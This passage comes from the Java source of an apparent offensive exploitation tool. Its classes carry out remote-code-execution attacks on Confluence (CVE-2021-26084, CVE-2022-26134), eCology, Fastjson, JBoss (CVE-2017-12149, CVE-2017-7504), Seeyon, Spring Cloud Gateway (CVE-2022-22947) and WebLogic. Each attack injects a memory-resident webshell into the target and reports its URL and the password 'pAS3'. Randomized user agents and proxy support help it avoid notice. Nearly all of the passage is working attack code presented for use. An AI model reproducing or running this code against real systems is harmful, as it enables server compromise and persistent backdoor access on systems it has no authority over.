| } 86 | 87 | return bytes; 88 | } 89 | 90 | public static byte[] serialize(Object ref) throws IOException { 91 | ByteArrayOutputStream out = new ByteArrayOutputStream(); 92 | ObjectOutputStream objOut = new ObjectOutputStream(out); 93 | objOut.writeObject(ref); 94 | return out.toByteArray(); 95 | } 96 | 97 | public static String getCmdFromBase(String base) throws Exception { 98 | int firstIndex = base.lastIndexOf("/"); 99 | String cmd = base.substring(firstIndex + 1); 100 | 101 | int secondIndex = base.lastIndexOf("/", firstIndex - 1); 102 | if (secondIndex < 0) { 103 | secondIndex = 0; 104 | } 105 | 106 | if (base.substring(secondIndex + 1, firstIndex).equalsIgnoreCase("base64")) { 107 | byte[] bytes = Util.base64Decode(cmd); 108 | cmd = new String(bytes); 109 | } 110 | 111 | return cmd; 112 | } 113 | 114 | public static String GZIPCompress(String str) 115 | throws IOException 116 | { 117 | if ((str == null) || (str.length() == 0)) { 118 | return str; 119 | } 120 | ByteArrayOutputStream out = new ByteArrayOutputStream(); 121 | GZIPOutputStream gzip = new GZIPOutputStream(out); 122 | gzip.write(str.getBytes("UTF-8")); 123 | gzip.close(); 124 | return out.toString("ISO-8859-1"); 125 | } 126 | 127 | } -------------------------------------------------------------------------------- /src/main/java/exp/AttackBase.java: -------------------------------------------------------------------------------- 1 | package exp; 2 | 3 | import java.util.HashMap; 4 | 5 | public interface AttackBase { 6 | void run(HashMap params) throws Exception; 7 | } 8 | -------------------------------------------------------------------------------- /src/main/java/exp/BaseExp.java: -------------------------------------------------------------------------------- 1 | package exp; 2 | 3 | 4 | import okhttp3.Response; 5 | import utils.UserAgentUtil; 6 | import utils.okhttplib.OkHttp; 7 | import utils.okhttplib.ProxyConfig; 8 | 9 | import java.io.File; 10 | import java.net.MalformedURLException; 11 | import java.net.URI; 12 | import java.net.URL; 13 | import java.util.*; 14 | 15 | 16 | public abstract class BaseExp 17 | { 18 | public String url = null; 19 | public int chunkCount = -1; 20 | public ProxyConfig proxyConfig = null; 21 | public HashMap headers = new HashMap(); 22 | 23 | 24 | public String getStripUrl(String target){ 25 | try { 26 | URL url = new URL(target); 27 | int port = url.getPort(); 28 | return url.getProtocol() + "://" + url.getHost() + ":" + ((port == -1) ? "80" : String.valueOf(port)); 29 | } catch (MalformedURLException e) { 30 | e.printStackTrace(); 31 | } 32 | return ""; 33 | } 34 | 35 | public Response launch(String url, HashMap headers) throws Exception { 36 | this.headers.put("User-Agent", UserAgentUtil.getRandomUserAgent()); 37 | if (headers != null) { 38 | this.headers.putAll(headers); 39 | } 40 | if (this.proxyConfig != null) { 41 | return OkHttp.httpGet(url, this.headers, this.proxyConfig); 42 | } 43 | else { 44 | return OkHttp.httpGet(url, this.headers); 45 | } 46 | } 47 | 48 | public Response launch(String url, String body, String mime, HashMap headers) throws Exception { 49 | this.headers.put("User-Agent", UserAgentUtil.getRandomUserAgent()); 50 | if (headers != null) { 51 | this.headers.putAll(headers); 52 | } 53 | if (this.proxyConfig != null) { 54 | return OkHttp.httpPost(url, body, mime, this.headers, this.proxyConfig, this.chunkCount); 55 | } 56 | else { 57 | return OkHttp.httpPost(url, body, mime, this.headers, this.chunkCount); 58 | } 59 | } 60 | 61 | public Response launch(String url, byte[] body, String mime, HashMap headers) throws Exception { 62 | this.headers.put("User-Agent", UserAgentUtil.getRandomUserAgent()); 63 | if (headers != null) { 64 | this.headers.putAll(headers); 65 | } 66 | if (this.proxyConfig != null) { 67 | return OkHttp.httpPut(url, body, mime, this.headers, this.proxyConfig, this.chunkCount); 68 | } 69 | else { 70 | return OkHttp.httpPut(url, body, mime, this.headers, this.chunkCount); 71 | } 72 | } 73 | 74 | public Response launchPostByte(String url, byte[] body, String mime, HashMap headers) throws Exception { 75 | this.headers.put("User-Agent", UserAgentUtil.getRandomUserAgent()); 76 | if (headers != null) { 77 | this.headers.putAll(headers); 78 | } 79 | if (this.proxyConfig != null) { 80 | return OkHttp.httpPost(url, body, mime, this.headers, this.proxyConfig, this.chunkCount); 81 | } else { 82 | return OkHttp.httpPost(url, body, mime, this.headers, this.chunkCount); 83 | } 84 | } 85 | 86 | 87 | } 88 | -------------------------------------------------------------------------------- /src/main/java/exp/Run.java: -------------------------------------------------------------------------------- 1 | package exp; 2 | 3 | import core.GenerateMemShell; 4 | import javafx.scene.control.TextArea; 5 | import utils.Util; 6 | 7 | import java.lang.reflect.Constructor; 8 | import java.lang.reflect.InvocationTargetException; 9 | import java.lang.reflect.Method; 10 | import java.util.HashMap; 11 | 12 | public class Run { 13 | public static void attack(TextArea textArea, String expName, HashMap params){ 14 | String packageName = expName.split("_")[0]; 15 | String classPath = "exp." + packageName.toLowerCase() + "." + expName; 16 | try { 17 | Class clazz = Class.forName(classPath); 18 | Constructor con = clazz.getConstructor(); 19 | Object aInstance = con.newInstance(); 20 | Method startMethod = clazz.getDeclaredMethod("run", HashMap.class); 21 | startMethod.invoke(aInstance, params); 22 | String message = Util.messageQueue.poll(); 23 | while (message !=null && !message.equalsIgnoreCase("")){ 24 | textArea.appendText(message); 25 | message = Util.messageQueue.poll(); 26 | } 27 | } catch (ClassNotFoundException ex) { 28 | ex.printStackTrace(); 29 | } catch (InvocationTargetException invocationTargetException) { 30 | invocationTargetException.printStackTrace(); 31 | } catch (InstantiationException instantiationException) { 32 | instantiationException.printStackTrace(); 33 | } catch (IllegalAccessException illegalAccessException) { 34 | illegalAccessException.printStackTrace(); 35 | } catch (NoSuchMethodException noSuchMethodException) { 36 | noSuchMethodException.printStackTrace(); 37 | } 38 | } 39 | 40 | public static String generateMemString(String memName, String encodeName, String version){ 41 | return GenerateMemShell.generateMemShell(memName, encodeName, version); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /src/main/java/exp/confluence/Confluence_CVE_2021_26084.java: -------------------------------------------------------------------------------- 1 | package exp.confluence; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import utils.Util; 8 | 9 | import java.util.HashMap; 10 | import java.util.Map; 11 | import java.util.regex.Matcher; 12 | import java.util.regex.Pattern; 13 | 14 | public class Confluence_CVE_2021_26084 extends BaseExp implements AttackBase{ 15 | 16 | private static Map VersionToJdk = new HashMap(); 17 | static{ 18 | VersionToJdk.put("7.4.10", "jdk9"); 19 | VersionToJdk.put("6.10.2", "jdk8"); 20 | } 21 | 22 | public String checkVersion(String stripUrl){ 23 | String version = ""; 24 | try{ 25 | HashMap header = new HashMap(); 26 | header.put("Cache-Control", "max-age=0"); 27 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 28 | Response response = this.launch(stripUrl + "/login.action", header); 29 | byte[] responseBytes =response.body().bytes(); 30 | String bodyResult = new String(responseBytes, "utf-8");; 31 | response.close(); 32 | if (bodyResult.contains("ajs-version-number")) { 33 | String pattern = "ajs-version-number\" content=\"([\\d.]+)"; 34 | Pattern r = Pattern.compile(pattern); 35 | Matcher matcher = r.matcher(bodyResult); 36 | if(matcher.find()){ 37 | version = matcher.group().split("=\"")[1]; 38 | } 39 | } 40 | }catch (Exception ex){ 41 | 42 | } 43 | return version; 44 | } 45 | 46 | 47 | public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) { 48 | boolean success = false; 49 | Object payload = null; 50 | try { 51 | payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 52 | HashMap header = new HashMap(); 53 | header.put("Cache-Control", "max-age=0"); 54 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 55 | header.put("Accept-Encoding", "gzip, deflate"); 56 | header.put("Accept-Language", "zh-CN,zh;q=0.9"); 57 | String mime = "application/x-www-form-urlencoded; charset=utf-8"; 58 | this.launch(stripUrl +"/pages/doenterpagevariables.action" , (String)payload, mime, header); 59 | header.put("X-Requested-With", "XmlHTTPRequest"); 60 | Response response = this.launch(stripUrl + "/jcaptcha", header); 61 | String bodyResult = response.body().string(); 62 | response.close(); 63 | if (bodyResult.contains("Success")) { 64 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/jcaptcha")); 65 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 66 | Util.messageQueue.add(String.format("Key: key\n")); 67 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 68 | Util.messageQueue.add("---------------------------\n"); 69 | }else { 70 | Util.messageQueue.add("注入失败"); 71 | } 72 | 73 | }catch (Exception e){ 74 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 75 | } 76 | } 77 | 78 | @Override 79 | public void run(HashMap params) { 80 | String target = params.get("target"); 81 | String payloadType = params.get("payloadType"); 82 | String gadgetType = params.get("gadgetType"); 83 | 84 | String stripUrl = this.getStripUrl(target); 85 | 86 | String version = this.checkVersion(stripUrl); 87 | if (version.equals("")){ 88 | return; 89 | } 90 | String trojanType = VersionToJdk.get(version); 91 | this.attack(stripUrl, gadgetType, payloadType, trojanType); 92 | 93 | } 94 | } 95 | -------------------------------------------------------------------------------- /src/main/java/exp/confluence/Confluence_CVE_2022_26134.java: -------------------------------------------------------------------------------- 1 | package exp.confluence; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import utils.Util; 8 | 9 | import java.net.URLEncoder; 10 | import java.util.HashMap; 11 | import java.util.Map; 12 | 13 | public class Confluence_CVE_2022_26134 extends BaseExp implements AttackBase { 14 | private static Map VersionToJdk = new HashMap(); 15 | 16 | 17 | 18 | public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) { 19 | boolean success = false; 20 | String payload = null; 21 | try { 22 | 23 | payload = (String)GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 24 | String[] payloads = payload.split("postData"); 25 | HashMap header = new HashMap(); 26 | header.put("Cache-Control", "max-age=0"); 27 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 28 | header.put("Accept-Encoding", "gzip, deflate"); 29 | header.put("Accept-Language", "zh-CN,zh;q=0.9"); 30 | String mime = "application/x-www-form-urlencoded; charset=utf-8"; 31 | String postData = "search=" +URLEncoder.encode(payloads[1], "utf-8"); 32 | this.launch(stripUrl +"/" + payloads[0] , postData, mime, header); 33 | header.put("X-Requested-With", "XmlHTTPRequest"); 34 | Response response = this.launch(stripUrl + "/jcaptcha", header); 35 | String bodyResult = response.body().string(); 36 | response.close(); 37 | if (bodyResult.contains("Success")) { 38 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/jcaptcha")); 39 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 40 | Util.messageQueue.add(String.format("Key: key\n")); 41 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 42 | Util.messageQueue.add("---------------------------\n"); 43 | }else { 44 | Util.messageQueue.add("注入失败"); 45 | } 46 | 47 | }catch (Exception e){ 48 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 49 | } 50 | } 51 | 52 | @Override 53 | public void run(HashMap params) { 54 | String target = params.get("target"); 55 | String payloadType = params.get("payloadType"); 56 | String gadgetType = params.get("gadgetType"); 57 | String trojanType = params.get("trojanType"); 58 | 59 | 60 | this.attack(target, gadgetType, payloadType, trojanType); 61 | 62 | } 63 | } 64 | -------------------------------------------------------------------------------- /src/main/java/exp/ecology/ECology_BeanShell_RCE.java: -------------------------------------------------------------------------------- 1 | package exp.ecology; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import utils.Util; 8 | 9 | import java.lang.reflect.InvocationTargetException; 10 | import java.util.HashMap; 11 | 12 | public class ECology_BeanShell_RCE extends BaseExp implements AttackBase { 13 | 14 | public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) { 15 | Object payload = null; 16 | try { 17 | payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 18 | HashMap header = new HashMap(); 19 | header.put("Cache-Control", "max-age=0"); 20 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 21 | header.put("Accept", "*/*"); 22 | String mime = "application/x-www-form-urlencoded; charset=utf-8"; 23 | String payloadString = "bsh.script=" + (String)payload; 24 | this.launch(stripUrl + "/bsh.servlet.BshServlet" , payloadString, mime, header); 25 | header.put("X-Requested-With", "XmlHTTPRequest"); 26 | Response response = this.launch(stripUrl + "/xxx", header); 27 | String bodyResult = response.body().string(); 28 | response.close(); 29 | if (bodyResult.contains("Success")) { 30 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/xxxx")); 31 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 32 | Util.messageQueue.add(String.format("Key: key\n")); 33 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 34 | Util.messageQueue.add("---------------------------\n"); 35 | }else { 36 | Util.messageQueue.add("注入失败"); 37 | } 38 | 39 | }catch (Exception e){ 40 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 41 | } 42 | } 43 | 44 | @Override 45 | public void run(HashMap params) { 46 | String target = params.get("target"); 47 | String payloadType = params.get("payloadType"); 48 | String gadgetType = params.get("gadgetType"); 49 | String trojanType = params.get("trojanType"); 50 | this.attack(target, gadgetType, payloadType, trojanType); 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /src/main/java/exp/fastjson/Fastjson_AutoType_ByPass.java: -------------------------------------------------------------------------------- 1 | package exp.fastjson; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import utils.Util; 8 | import utils.okhttplib.OkHttp; 9 | 10 | import java.io.IOException; 11 | import java.util.HashMap; 12 | import java.util.regex.Matcher; 13 | import java.util.regex.Pattern; 14 | 15 | public class Fastjson_AutoType_ByPass extends BaseExp implements AttackBase { 16 | 17 | public void detectVersion(String target){ 18 | String version = "UnKnow"; 19 | String payload = "{\"@type\":\"java.lang.AutoCloseable\""; 20 | HashMap header = new HashMap(); 21 | header.put("Cache-Control", "max-age=0"); 22 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 23 | header.put("Accept-Encoding", "gzip, deflate"); 24 | header.put("Accept-Language", "zh-CN,zh;q=0.9"); 25 | 26 | String mime = "application/json; charset=utf-8"; 27 | // sendRequest 28 | Response response = null; 29 | try { 30 | response = this.launch(target, payload.toString(), mime, header); 31 | String bodyResult = response.body().string(); 32 | String pattern = "version ([\\d.]+)"; 33 | Pattern r = Pattern.compile(pattern); 34 | Matcher matcher = r.matcher(bodyResult); 35 | if(matcher.find()){ 36 | version = matcher.group().split(" ")[1]; 37 | } 38 | } catch (IOException e) { 39 | e.printStackTrace(); 40 | } catch (Exception e) { 41 | e.printStackTrace(); 42 | } 43 | finally { 44 | Util.messageQueue.add(String.format("FastJson Version is: %s \n", version)); 45 | } 46 | response.close(); 47 | } 48 | 49 | public boolean attack(String target, String gadgetType, String payloadType, String trojanType) { 50 | boolean success = false; 51 | Object payload = null; 52 | try { 53 | payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 54 | HashMap header = new HashMap(); 55 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 56 | String mime = "application/json; charset=utf-8"; 57 | this.launch(target ,payload.toString(), mime, header); 58 | header.put("X-Requested-With", "XmlHTTPRequest"); 59 | Response response = this.launch(target, header); 60 | String bodyResult = response.body().string(); 61 | response.close(); 62 | if (bodyResult.contains("Success")) { 63 | success = true; 64 | Util.messageQueue.add(String.format("Shell_Url: %s\n", target)); 65 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 66 | Util.messageQueue.add(String.format("Key: key\n")); 67 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 68 | Util.messageQueue.add("---------------------------\n"); 69 | }else { 70 | Util.messageQueue.add("注入失败"); 71 | } 72 | 73 | }catch (Exception e){ 74 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 75 | } 76 | return success; 77 | } 78 | 79 | @Override 80 | public void run(HashMap params) { 81 | String target = params.get("target"); 82 | String [] trojanTypes = new String[]{ 83 | "FastJson_1224", 84 | "FastJson_1224_2", 85 | "FastJson_1224_3", 86 | "FastJson_1224_4", 87 | "FastJson_1247", 88 | "FastJson_1247_2", 89 | "FastJson_1247_3", 90 | "FastJson_1247_4" 91 | }; 92 | String gadgetType = params.get("gadgetType"); 93 | String payloadType = params.get("payloadType"); 94 | this.detectVersion(target); 95 | for (String trojanType: trojanTypes){ 96 | if (this.attack(target, gadgetType,payloadType, trojanType)) break; 97 | } 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /src/main/java/exp/jboss/JBoss_CVE_2017_12149.java: -------------------------------------------------------------------------------- 1 | package exp.jboss; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import ui.Config; 8 | import utils.Util; 9 | 10 | import java.lang.reflect.InvocationTargetException; 11 | import java.util.HashMap; 12 | 13 | public class JBoss_CVE_2017_12149 extends BaseExp implements AttackBase { 14 | public boolean attack(String stripUrl, String gadgetType, String payloadType, String trojanType) { 15 | byte[] payload = null; 16 | try { 17 | payload = GeneratePayload.generatePayloadByte(gadgetType, payloadType, trojanType); 18 | HashMap header = new HashMap(); 19 | header.put("Cache-Control", "max-age=0"); 20 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 21 | header.put("Accept", "*/*"); 22 | String mime = "application/x-www-form-urlencoded; charset=utf-8"; 23 | this.launchPostByte(stripUrl + "/invoker/readonly" , payload, mime, header); 24 | header.put("X-Requested-With", "XmlHTTPRequest"); 25 | Response response = this.launch(stripUrl + "/invoker/", header); 26 | String bodyResult = response.body().string(); 27 | response.close(); 28 | if (bodyResult.contains("Success")) { 29 | Util.messageQueue.add(String.format("Gadget: %s\n", gadgetType)); 30 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/invoker/")); 31 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 32 | Util.messageQueue.add(String.format("Key: key\n")); 33 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 34 | Util.messageQueue.add("---------------------------\n"); 35 | return true; 36 | }else { 37 | Util.messageQueue.add("注入失败"); 38 | } 39 | 40 | }catch (Exception e){ 41 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 42 | } 43 | return false; 44 | } 45 | 46 | public void sendAllGadget(String stripUrl, String payloadType, String trojanType){ 47 | for(String gadget: Config.CommonsGadget){ 48 | if (gadget.equalsIgnoreCase("all"))continue; 49 | if (this.attack(stripUrl, gadget, payloadType, trojanType)){ 50 | break; 51 | } 52 | } 53 | } 54 | 55 | @Override 56 | public void run(HashMap params) { 57 | String target = params.get("target"); 58 | String payloadType = params.get("payloadType"); 59 | String gadgetType = params.get("gadgetType"); 60 | String trojanType = params.get("trojanType"); 61 | 62 | String stripUrl = this.getStripUrl(target); 63 | 64 | if (gadgetType.equalsIgnoreCase("all")){ 65 | this.sendAllGadget(stripUrl, payloadType, trojanType); 66 | } 67 | else { 68 | this.attack(stripUrl, gadgetType, payloadType, trojanType); 69 | 70 | } 71 | 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /src/main/java/exp/jboss/JBoss_CVE_2017_7504.java: -------------------------------------------------------------------------------- 1 | package exp.jboss; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import ui.Config; 8 | import utils.Util; 9 | 10 | import java.lang.reflect.InvocationTargetException; 11 | import java.util.HashMap; 12 | 13 | public class JBoss_CVE_2017_7504 extends BaseExp implements AttackBase { 14 | public boolean attack(String stripUrl, String gadgetType, String payloadType, String trojanType) { 15 | byte[] payload = null; 16 | try { 17 | payload = GeneratePayload.generatePayloadByte(gadgetType, payloadType, trojanType); 18 | HashMap header = new HashMap(); 19 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 20 | header.put("Accept", "*/*"); 21 | String mime = "application/x-www-form-urlencoded"; 22 | this.launchPostByte(stripUrl + "/jbossmq-httpil/HTTPServerILServlet" , payload, mime, header); 23 | header.put("X-Requested-With", "XmlHTTPRequest"); 24 | Response response = this.launch(stripUrl + "/jbossmq-httpil/HTTPServerILServlet", header); 25 | String bodyResult = response.body().string(); 26 | response.close(); 27 | if (bodyResult.contains("Success")) { 28 | Util.messageQueue.add(String.format("Gadget: %s\n", gadgetType)); 29 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/jbossmq-httpil/HTTPServerILServlet")); 30 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 31 | Util.messageQueue.add(String.format("Key: key\n")); 32 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 33 | Util.messageQueue.add("---------------------------\n"); 34 | return true; 35 | }else { 36 | Util.messageQueue.add("注入失败"); 37 | } 38 | 39 | }catch (Exception e){ 40 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 41 | } 42 | return false; 43 | } 44 | 45 | public void sendAllGadget(String stripUrl, String payloadType, String trojanType){ 46 | for(String gadget: Config.CommonsGadget){ 47 | if (gadget.equalsIgnoreCase("all"))continue; 48 | if (this.attack(stripUrl, gadget, payloadType, trojanType)){ 49 | break; 50 | } 51 | } 52 | } 53 | 54 | 55 | @Override 56 | public void run(HashMap params) { 57 | String target = params.get("target"); 58 | String payloadType = params.get("payloadType"); 59 | String gadgetType = params.get("gadgetType"); 60 | String trojanType = params.get("trojanType"); 61 | 62 | String stripUrl = this.getStripUrl(target); 63 | 64 | if (gadgetType.equalsIgnoreCase("all")){ 65 | this.sendAllGadget(stripUrl, payloadType, trojanType); 66 | } 67 | else { 68 | this.attack(stripUrl, gadgetType, payloadType, trojanType); 69 | } 70 | 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /src/main/java/exp/seeyon/Seeyon_Unauthorized_RCE.java: -------------------------------------------------------------------------------- 1 | package exp.seeyon; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import utils.Util; 8 | import utils.okhttplib.OkHttp; 9 | 10 | import java.lang.reflect.InvocationTargetException; 11 | import java.util.HashMap; 12 | 13 | public class Seeyon_Unauthorized_RCE extends BaseExp implements AttackBase { 14 | 15 | public void attack(String target, String gadgetType, String payloadType, String trojanType) { 16 | byte[] payload = null; 17 | try { 18 | payload = GeneratePayload.generatePayloadByte(gadgetType, payloadType, trojanType); 19 | HashMap header = new HashMap(); 20 | header.put("Cache-Control", "max-age=0"); 21 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 22 | String mime = "application/x-www-form-urlencoded; charset=utf-8"; 23 | this.launch(target + 24 | "/autoinstall.do.zxc/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip", 25 | new String(payload), mime, header); 26 | header.put("X-Requested-With", "XmlHTTPRequest"); 27 | Response response = this.launch(target + "/common/all-min.css", header); 28 | String bodyResult = response.body().string(); 29 | response.close(); 30 | if (bodyResult.contains("Success")) { 31 | Util.messageQueue.add(String.format("Shell_Url: %s\n", target + "/common/all-min.css")); 32 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 33 | Util.messageQueue.add(String.format("Key: key\n")); 34 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 35 | Util.messageQueue.add("---------------------------\n"); 36 | }else { 37 | Util.messageQueue.add("注入失败"); 38 | } 39 | 40 | }catch (Exception e){ 41 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 42 | } 43 | } 44 | 45 | @Override 46 | public void run(HashMap params) { 47 | String target = params.get("target"); 48 | String payloadType = params.get("payloadType"); 49 | String gadgetType = params.get("gadgetType"); 50 | String trojanType = params.get("trojanType"); 51 | this.attack(target, gadgetType, payloadType, trojanType); 52 | } 53 | 54 | } 55 | -------------------------------------------------------------------------------- /src/main/java/exp/springgateway/SpringGateWay_CVE_2022_22947.java: -------------------------------------------------------------------------------- 1 | package exp.springgateway; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import utils.Util; 8 | 9 | import java.lang.reflect.InvocationTargetException; 10 | import java.util.HashMap; 11 | 12 | public class SpringGateWay_CVE_2022_22947 extends BaseExp implements AttackBase { 13 | 14 | public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) { 15 | Object payload = null; 16 | try { 17 | payload = GeneratePayload.generatePayloadByte(gadgetType, payloadType, trojanType); 18 | HashMap header = new HashMap(); 19 | header.put("Cache-Control", "max-age=0"); 20 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 21 | header.put("Accept-Encoding", "gzip, deflate"); 22 | header.put("Accept-Language", "zh-CN,zh;q=0.9"); 23 | String mime = "application/json"; 24 | // String payloadString = payload.toString(); 25 | String payloadString = new String((byte[])payload); 26 | this.launch(stripUrl + "/actuator/gateway/routes/" + trojanType,payloadString, mime, header); 27 | mime = "application/x-www-form-urlencoded"; 28 | this.launch(stripUrl + "/actuator/gateway/refresh","", mime, header); 29 | if(payloadType.contains("Netty")){ 30 | Util.messageQueue.add("请自行验证, 多次尝试(1+)!!!\n"); 31 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/" + trojanType)); 32 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 33 | Util.messageQueue.add(String.format("Key: key\n")); 34 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 35 | Util.messageQueue.add("---------------------------\n"); 36 | return; 37 | } 38 | header.put("X-Requested-With", "XmlHTTPRequest"); 39 | header.put("tyr", "XmlHTTPRequest"); 40 | Response response = this.launch(stripUrl + "/" + trojanType, "", mime, header); 41 | String bodyResult = response.body().string(); 42 | response.close(); 43 | if (bodyResult.contains("\"null\"")) { 44 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/" + trojanType)); 45 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 46 | Util.messageQueue.add(String.format("Key: key\n")); 47 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 48 | Util.messageQueue.add("---------------------------\n"); 49 | }else { 50 | Util.messageQueue.add("注入失败"); 51 | } 52 | 53 | }catch (Exception e){ 54 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 55 | } 56 | } 57 | 58 | @Override 59 | public void run(HashMap params) { 60 | String target = params.get("target"); 61 | String payloadType = params.get("payloadType"); 62 | String gadgetType = params.get("gadgetType"); 63 | String trojanType = Util.getRandomString(4); 64 | String stripUrl = this.getStripUrl(target); 65 | this.attack(stripUrl, gadgetType, payloadType, trojanType); 66 | } 67 | } 68 | -------------------------------------------------------------------------------- /src/main/java/exp/weblogic/Weblogic_0Day_1.java: -------------------------------------------------------------------------------- 1 | package exp.weblogic; 2 | 3 | import core.GeneratePayload; 4 | import exp.AttackBase; 5 | import exp.BaseExp; 6 | import okhttp3.Response; 7 | import utils.Util; 8 | import utils.okhttplib.OkHttp; 9 | import utils.weblogic.IIOPProtocolOperation; 10 | import utils.weblogic.T3ProtocolOperation; 11 | 12 | import java.lang.reflect.InvocationTargetException; 13 | import java.util.HashMap; 14 | 15 | public class Weblogic_0Day_1 extends BaseExp implements AttackBase { 16 | public void attack(String protocol, String stripUrl, String gadgetType, String payloadType, String trojanType) { 17 | Object payload = null; 18 | String[] ipAndPort = Util.getIPAndPortFromBase(stripUrl); 19 | String host = ipAndPort[0]; 20 | String port = ipAndPort[1]; 21 | try { 22 | try { 23 | payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 24 | if (protocol.equalsIgnoreCase("t3")) { 25 | //T3 send 26 | T3ProtocolOperation.send(protocol, host, port, Util.serialize(payload)); 27 | } else if (protocol.equalsIgnoreCase("iiop")) { 28 | IIOPProtocolOperation.send(host,port, payload); 29 | } 30 | }catch (Exception e){} 31 | HashMap header = new HashMap(); 32 | String mime = "application/x-www-form-urlencoded"; 33 | header.put("X-Requested-With", "XmlHTTPRequest"); 34 | Response response = this.launch(stripUrl + "/console/css/login.css", "", mime, header); 35 | String bodyResult = response.body().string(); 36 | response.close(); 37 | if (bodyResult.contains("Success")) { 38 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/console/css/login.css")); 39 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 40 | Util.messageQueue.add(String.format("Key: key\n")); 41 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 42 | 